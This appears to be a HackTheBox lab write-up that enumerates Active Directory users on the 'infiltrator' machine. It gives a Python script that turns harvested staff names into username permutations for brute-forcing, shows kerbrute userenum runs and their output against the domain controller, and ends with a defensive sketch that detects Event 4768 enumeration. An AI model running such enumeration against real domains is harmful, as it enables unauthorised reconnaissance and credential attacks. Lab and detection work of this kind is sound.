Username_Enumeration


Possible usernames found in the Testimonials section of the target web server

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ cat names.txt       
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez

Created a file, names.txt, containing possible users

Username Generator V2


#!/usr/bin/env python3
 
import argparse
 
 
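def generate_root_list_lowercase(wordlist):
    names = []
    with open(wordlist) as f:                               # Open file for processing
        for line in f:
            name = line.strip().lower()
            if len(name.split()) >= 2:                      # Skip blank lines and single-word entries (no surname to index)
                names.append(name)
    return names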
 
 
def lowercase_transformations(names):
    for line in names:
        print(line.split()[0])                              # john lennon -> john
        print(line.split()[1])                              # john lennon -> lennon
        print(line[0] + '.' + line.split()[1])              # john lennon -> j.lennon
        print(line[0] + '-' + line.split()[1])              # john lennon -> j-lennon
        print(line[0] + '_' + line.split()[1])              # john lennon -> j_lennon
        print(line[0] + '+' + line.split()[1])              # john lennon -> j+lennon
        print(line[0] + line.split()[1])                    # john lennon -> jlennon
        print(line.split()[0]+line.split()[1])              # john lennon -> johnlennon
        print(line.split()[1]+line.split()[0])              # john lennon -> lennonjohn
        print(line.split()[0] + '.' + line.split()[1])      # john lennon -> john.lennon
        print(line.split()[1] + '.' + line.split()[0])      # john lennon -> lennon.john
 
 
 
def uppercase_transformations(names):
    for line in names:
        firstWord = line.split()[0]
        secondWord = line.split()[1]
        print(firstWord.capitalize())                                       # john lennon -> John
        print(secondWord.capitalize())                                      # john lennon -> Lennon
        print(firstWord[0].upper() + '.' + secondWord.capitalize())         # john lennon -> J.Lennon
        print(firstWord[0].upper() + '_' + secondWord.capitalize())         # john lennon -> J_Lennon
        print(firstWord[0].upper() + '-' + secondWord.capitalize())         # john lennon -> J-Lennon
        print(firstWord[0].upper() + secondWord.capitalize())               # john lennon -> JLennon
        print(firstWord.capitalize() + secondWord.capitalize())             # john lennon -> JohnLennon
        print(secondWord.capitalize() + firstWord.capitalize())             # john lennon -> LennonJohn
        print(firstWord.upper())                                            # john lennon -> JOHN
        print(secondWord.upper())                                           # john lennon -> LENNON
        print(firstWord.upper() + secondWord.upper())                       # john lennon -> JOHNLENNON
 
 
 
 
parser = argparse.ArgumentParser(description='Python script to generate user lists for bruteforcing!')
parser.add_argument('-w', '--wordlist', type=str, metavar='wordlist', required=True, help="Specify path to the wordlist")
parser.add_argument('-u', '--uppercase', action='store_true', help='Also produce uppercase permutations. Disabled by default')
 
 
args = parser.parse_args()
 
names = generate_root_list_lowercase(args.wordlist)
lowercase_transformations(names)
 
if args.uppercase:
    uppercase_transformations(names)

A simple Python script to generate possible usernames

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ python3 ~/Tools/username_gen_v2.py -w names.txt > possible_usernames.txt

Output saved as possible_usernames.txt

Additional


The naming convention that the target organization appears to use was disclosed by the earlier bruteforce attack.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ python3 ~/Tools/username_generator.py       
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 2
Mail domain (example: ...@domain.com) [Default: none]: 
Domain (example: domain\...) [Default: none]: 
Surnames file path: /usr/share/seclists/Usernames/Names/familynames-usa-top1000.txt
Output file [Default: results.txt]: 
Output saved in results.txt

Created an additional wordlist following the disclosed username convention, saved as results.txt

Kerbrute


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute userenum --dc dc01.infiltrator.htb -d INFILTRATOR.HTB ./possible_usernames.txt -t 200                      
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
 
2024/09/01 00:17:43 >  Using KDC(s):
2024/09/01 00:17:43 >  	dc01.infiltrator.htb:88
 
2024/09/01 00:17:43 >  [+] VALID USERNAME:	 k.turner@INFILTRATOR.HTB
2024/09/01 00:17:43 >  [+] VALID USERNAME:	 d.anderson@INFILTRATOR.HTB
2024/09/01 00:17:43 >  [+] VALID USERNAME:	 a.walker@INFILTRATOR.HTB
2024/09/01 00:17:43 >  [+] VALID USERNAME:	 o.martinez@INFILTRATOR.HTB
2024/09/01 00:17:43 >  [+] VALID USERNAME:	 e.rodriguez@INFILTRATOR.HTB
2024/09/01 00:17:43 >  [+] VALID USERNAME:	 m.harris@INFILTRATOR.HTB
2024/09/01 00:17:43 >  [+] VALID USERNAME:	 l.clark@INFILTRATOR.HTB
2024/09/01 00:17:43 >  Done! Tested 77 usernames (7 valid) in 0.100 seconds

Kerbrute found 7 valid domain users. Those are saved into a file, users.txt

Kerbrute (additional)


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute userenum --dc dc01.infiltrator.htb -d INFILTRATOR.HTB ./results.txt -t 200                                               
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
 
2024/09/01 00:24:42 >  Using KDC(s):
2024/09/01 00:24:42 >  	dc01.infiltrator.htb:88
 
2024/09/01 00:24:42 >  [+] VALID USERNAME:	 d.ANDERSON@INFILTRATOR.HTB
2024/09/01 00:24:42 >  [+] VALID USERNAME:	 m.HARRIS@INFILTRATOR.HTB
2024/09/01 00:24:42 >  [+] VALID USERNAME:	 o.MARTINEZ@INFILTRATOR.HTB
2024/09/01 00:24:42 >  [+] VALID USERNAME:	 e.RODRIGUEZ@INFILTRATOR.HTB
2024/09/01 00:24:42 >  [+] VALID USERNAME:	 a.WALKER@INFILTRATOR.HTB
2024/09/01 00:24:42 >  [+] VALID USERNAME:	 l.CLARK@INFILTRATOR.HTB
2024/09/01 00:24:42 >  [+] VALID USERNAME:	 k.TURNER@INFILTRATOR.HTB
2024/09/01 00:24:51 >  Done! Tested 26000 usernames (7 valid) in 8.880 seconds

Same result
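
Detection view of the two runs above, as an added example that is not part of the original notes or of kerbrute: in the first run 70 of the 77 guesses were invalid and all arrived from one client in under a second. The sketch assumes the domain controller audits the Kerberos Authentication Service and records Event ID 4768 failures with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for unknown accounts; the record layout, IP addresses, window and threshold are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

UNKNOWN_PRINCIPAL = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN in Event ID 4768

def build_sample():
    """Constructed, simplified 4768 records: (time, client, account, result code)."""
    t0 = datetime(2024, 9, 1, 0, 17, 43)
    events = []
    # One client requesting TGTs for 70 accounts that do not exist, within 70 ms
    for i in range(70):
        events.append((t0 + timedelta(milliseconds=i), "10.10.14.5", f"guess{i}", "0x6"))
    # Background noise: a workstation with one mistyped account name
    events.append((t0 + timedelta(seconds=5), "10.10.20.8", "jsmtih", "0x6"))
    # Successful TGT request, ignored by the detector
    events.append((t0 + timedelta(seconds=6), "10.10.20.8", "jsmith", "0x0"))
    return events

def detect_enumeration(events, window=timedelta(seconds=60), threshold=20):
    """Return {client: peak count of distinct unknown principals in any window}
    for every client whose peak reaches the threshold."""
    per_client = defaultdict(list)
    for ts, client, account, code in events:
        if code.lower() == UNKNOWN_PRINCIPAL:
            # AD account names are case-insensitive, so d.ANDERSON == d.anderson
            per_client[client].append((ts, account.lower()))
    alerts = {}
    for client, hits in per_client.items():
        hits.sort()
        start = 0
        best = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans at most `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            distinct = len({name for _, name in hits[start:end + 1]})
            best = max(best, distinct)
        if best >= threshold:
            alerts[client] = best
    return alerts

if __name__ == "__main__":
    for client, count in detect_enumeration(build_sample()).items():
        print(f"possible Kerberos user enumeration from {client}: "
              f"{count} unknown principals within the window")
```

Counting distinct account names rather than raw failures keeps a single user retrying one typo below the threshold while a wordlist run like the 26000-name one above stands out immediately.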